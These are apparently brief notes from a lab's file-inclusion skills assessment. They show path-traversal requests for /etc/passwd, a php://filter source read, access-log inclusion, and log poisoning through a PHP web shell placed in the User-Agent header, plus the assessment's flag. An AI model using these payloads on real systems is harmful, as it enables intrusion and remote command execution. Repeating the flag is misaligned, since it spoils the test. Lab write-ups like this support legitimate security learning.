File Inclusion
Skills Assessment
Testing:
/index.php?page=..%252F..%252F..%252F..%252Fetc%252Fpasswd - invalid input detected
/index.php?page=php://filter/read=convert.base64-encode/resource=index - shows base64 code
We know the php://filter attack vector can bypass detection by the website.
Decode the Base64 index.php code in https://www.base64decode.org/
ilf_admin/index.php is discovered from index.php
Go to http://165.232.98.156:30234/ilf_admin/index.php?log=http.log
GET /ilf_admin/index.php?log=../../../../../etc/passwd
GET /ilf_admin/index.php?log=../../../../../var/log/nginx/access.log
User-Agent: Mozilla/5.0 <evil.php payload> Gecko/20100101 Firefox/102.0
evil.php payload: <?php php system($_GET['cmd']); ? >
flag:a9a892dbc9faf9a014f58e007721835e
Last updated